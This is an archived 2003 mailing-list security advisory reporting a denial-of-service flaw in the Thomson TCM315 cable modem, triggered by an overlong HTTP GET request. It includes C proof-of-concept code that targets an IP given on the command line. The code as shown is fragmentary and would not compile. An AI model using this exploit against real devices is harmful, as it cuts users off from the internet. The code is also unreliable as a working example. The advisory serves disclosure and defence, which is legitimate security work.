lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 23 Nov 2003 16:17:44 +0100
From: Administrador de ShellSec <>
Subject: Thomnson TCM315 Denial of service


                          . : Shell Security Advisory : .

Subject: Buffer overflow in the cable modem Thomson TCM315

Issue date: 2003 November 23

Related link:


Info about product:


[ - 1 - Introduction ]

Software description:

Thomson TCM315 cable modem

- DOCSIS 1.0 certified

- DOCSIS 2.0 ready and DOCSIS 1.1 compliant

- NAT/PAT/Firewall and integrated router for SOHO installations (in a 
separate software release)

- Bridging between the USB and Ethernet port

- Easy Access to Advanced Diagnostics Web Pages

- USB port for easy installation

- Reliable high-performance platform

- Surf the Internet Up to 100 Times Faster than a 56k analog Modem

- Internet On-Off button for enhanced security

[ - 2 - Problem description ]

The problem appears by sending an HTTP request with a long string to the 
cable modem, causing a deny of service (DoS). Example:






[ - 3 - How to exploit it ]

To test this vulnerability, we used the next code. Note: the code is 
written in C to be used in Windows systems, but it's easily portable to 
Unix systems.

--------------------- CUT HERE ---------------------

ADVISORY - Thomson Cablemodem TCM315 Denial of Service

Shell security group (2003)

November 10 of 2003

Tested against: TCM315 MP
Software Version: ST31.04.00
Software Model: A801
Bootloader: 2.1.4c
Impact: Users with access to the network can remotely shutdown internet 

Discovered by: aT4r Andres[at]
Vendor: contacted (no answer)
Fix: no yet

usage: just, thdos.exe


#include <stdio.h>
#include <winsock2.h>

void main(int argc,char *argv[]) {
char evil[150],buffer[1000];
struct sockaddr_in shellsec;
int fd;

WSAStartup( MAKEWORD(1,1), &( ws) );

shellsec.sin_family = AF_INET;
shellsec.sin_port = htons(80);
shellsec.sin_addr.s_addr = inet_addr(argv[1]);

sprintf(buffer,"GET /%s HTTP/1.1\r\n\r\n\r\n",evil);

if (connect(fd,( struct sockaddr *)&shellsec,sizeof(shellsec)) != -1) {
printf("done. Thomson Cablemodem reset!\n");
else printf("Unable to connect to CM.\n");

--------------------- CUT HERE ---------------------

[ - 4 - Solution ]

Thomson was advised about this vulnerability, but we got no answer, so as 
we know there is no patch to fix this issue.. As a possible solution, you 
can filter requests made to the cable modem.

[ - 5 - Credits ]

Autor: Andr├ęs Tarasc├│ ( andres[at] )
Redactor: Fernando Ortega ( fernando[at] )
Issue date: 23 de Noviembre de 2003


Administrador de Shell Security (admin[at]
Shell Security Group (

Powered by blists - more mailing lists